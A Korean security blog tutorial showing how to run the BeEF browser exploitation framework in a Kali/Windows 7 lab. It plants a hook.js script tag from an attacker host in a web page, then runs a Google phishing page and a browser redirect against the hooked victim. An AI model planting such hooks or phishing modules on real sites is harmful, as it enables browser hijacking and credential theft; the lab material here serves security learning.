본문으로 바로가기

웹 브라우저 해킹 ( BeEF XSS )

category Security/정보 수집 2017. 11. 13. 19:53

- WEB Attack : XSS(Cross Side Script)

BeEF(비프) XSS 프레임워크: 사용자 권한 획득 


- BeEF(Browser Exploit Framwork) 

사용자 웹 브라우저로 웹페이지를 읽을 때 자바 스크립트 형태로 동작하며, 사용자 PC의 정보 수집 부터 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구이다.


- XSS(Cross Side Script) 취약점

(스크립트 언어에 대해서)웹에서 사용하는 클라이언트 스크립트인 자바스크립트, VB 스크립트, CSS, 에이젝스(Ajax)등을 통해 스크립트에 접근한 사용자들에게 특정한 액션을 일으키게 하는 것을 의미한다.

(XSS 공격에 대해서) 공격자가 공격하려는 사이트에 악의적인 스크립트를 넣는 기술이다. 주 목적은 정보 획득(EX: 쿠키 정보(세션)등) 또는 악성코드 실행할 사이트로 유도하는 용도로 많이 사용된다. 

특정한 액셕이라는 것은 악성 코드 유포나, 윔, 바이러스 배포등이 보통의 목적이다. 또한 사용자 정보를 수집할 수도 있다.


- 사용 프로그램

KaliLinux

Windows 7


- BeEF 실행


# beef-xss

 

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browser once it opens.

[*] UI URL: http://127.0.0.1:3000/ui/panel

[*] Hook: <script src="http://<IP>:3000/hook.js"></script>

[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

 



ID : beef PASS : beef


[참고] 에러 

"Can not connect server"  > # service postgresql start

툴이 자동적으로 실행 안되면 > # cd /usr/share/beef-xss     # build install      # beef-xss


- 웹페이지 만들기


# cd /var/www/html

> 디렉토리에 파일이 있으면 비워줍니다. 

# vi index.html

 

 <HTML>

<BODY>

<CENTER><H1> It works! </H1></CENTER>

<script src="http://192.168.27.50:3000/hook.js"></script>

<P>This is the default web page for this server.</P>

<P>The Web Server software is running but no content has been added, yet.</P>

</BODY>

</HTML>

 

> 웹페이지가 실행되면 스크립트가 실행됩니다. 

> 스크립트는 hook.js 를 3000 포트를 통해 연결합니다. 


# service apache2 restart


(win7)

크롬으로 확인합니다. ( 익스플로어는 잘 안됨 )

http://192.168.27.50


> 페이지가 잘 보입니다.  F12를 눌러 소스를 확인합니다. 


> 스크립트를 확인 할 수 있습니다. 아마 실행이 된거 같습니다. 


(Kali)

칼리 리눅스로 돌아와 beef를 확인해보면 win7 이 연결된것을 알 수 있습니다. 



- 웹 페이지를 공격해 본다

commands > Module Tree > Social Engineering > Google Phishing > Execute



[참고] 색깔 표시 의미

녹   색 : 사용자가 그 모듈의 작동을 알아채지 못할 것이라는 뜻이다.

노란색 : 경고 메세지 상자 등을 통해서 사용자가 공격을 알아 챌 수 있음을 뜻한다.

빨간색 : 해당 공격이 작동할 가능성이 낮음을 뜻한다.

회   색 : 대상 구성에 대해 해당 공격이 작동한다고 확인된 적이 없음을 뜻한다.


(win7) 

확인해보면 구글 사이트 같지만 주소가 192.168.27.50임을 알 수 있다. 


(kali) 

- 특정 웹 사이트로 이동시키기

Command > Module Tree > Browser > Hooked Domain > Redirect Browser

 이동 시킬 사이트는 google.com


(win7)

 정상적인 google 사이트로 이동 되었다. 


(kali)

beef를 확인해보면 사용자가 192.168.27.50 페이지에서 벗어났기 때문에 Offline Browsers 로 이동되었다. 



( 실습 복원 )

(win7) 크롬 종료

(kali) beef 종료 reboot






'Security > 정보 수집' 카테고리의 다른 글

Fake Update Site 구축  (0) 2017.11.13
BeEF 와 MSF 같이 사용하기  (0) 2017.11.13
Armitage 사용하기  (0) 2017.11.12
setoolkit을 이용한 Java Applet Attack  (0) 2017.11.12
SET ( Social Engineering Tech. )  (0) 2017.11.12